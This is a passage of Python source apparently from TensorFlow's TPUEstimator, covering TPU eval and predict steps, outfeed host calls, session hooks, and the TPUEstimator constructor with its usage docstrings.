host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + 'If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Allow users to specify the axis for batch size
# dimension.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = self._host_fns[name](**dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
else:
ret[name] = self._host_fns[name](*dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. However, if eval_on_tpu is False, `model_fn` must return
`EstimatorSpec` and the evaluation will execute on CPU or GPU; in this case
the following discussion on TPU evaluation does not apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_savedmodel` exports 2 metagraphs, one with `tag_constants.SERVING`,
and another with `tag_constants.SERVING` and `tag_constants.TPU`.
At serving time, these tags are used to select metagraph to load.
Before running the graph on TPU, TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If
not, please call `session.run(tpu.initialize_system())`.
`tpu.outside_compilation` can be used to wrap TPU incompatible ops in
`model_fn`.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
warm_start_from=None):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, 'evaluation_hooks',
and `prediction_hooks` must not capure any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently, -
TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below. - Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_savedmodel()` exports a metagraph for
serving on TPU besides the one on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = (
self._config.tpu_config.iterations_per_loop)
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu)
self._export_to_tpu = export_to_tpu
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
raise NotImplementedError(
'TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; '
'got {}.'.format(mode))
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables))
if self._export_to_tpu:
input_receiver_fn_map = {
_REWRITE_FOR_INFERENCE_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _REWRITE_FOR_INFERENCE_MODE
# See b/110052256 for why `check_variables` is `False`.
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables=False,
mode=mode,
export_tags=export_tags,
check_variables=False))
def _call_model_fn(self, features, labels, mode, config):
if mode == _REWRITE_FOR_INFERENCE_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_savedmodel`."""
if mode != _REWRITE_FOR_INFERENCE_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_REWRITE_FOR_INFERENCE_MODE, mode))
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
mode = model_fn_lib.ModeKeys.PREDICT
estimator_spec = self._call_model_fn(features, labels, mode, config)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
tensors_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
tensors = nest.flatten(tensors_dict)
tpu_tensors = [t for t in tensors if _is_tpu_tensor(t)]
# We cannot return anything other than `tpu_tensors` here so we capture
# the rest for later use.
capture.capture((estimator_spec, tensors_dict, tensors))
return tpu_tensors
tpu_tensors_on_cpu = tpu.rewrite_for_inference(computation)
estimator_spec, tensors_dict, tensors = capture.get()
# Reconstruct `tensors`, but with `tpu_tensors` replaced with
# `tpu_tensors_on_cpu`.
new_tensors = []
for t in tensors:
if _is_tpu_tensor(t):
new_tensors.append(tpu_tensors_on_cpu.pop(0))
elif t is None:
new_tensors.append(None)
else:
# Only fetching `tpu_tensors_on_cpu` does not trigger
# TPU computation and blocks, so we add the control dependency here.
control_inputs = (
tpu_tensors_on_cpu if isinstance(tpu_tensors_on_cpu,
(list, tuple)) else
(tpu_tensors_on_cpu,))
with ops.control_dependencies(control_inputs):
new_tensors.append(array_ops.identity(t))
# Reconstruct `tensors_dict`.
new_tensors_dict = nest.pack_sequence_as(tensors_dict, new_tensors)
# Reconstruct `export_outputs`.
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_tensors_dict))
return estimator_spec._replace(export_outputs=new_export_outputs)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either fatures or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
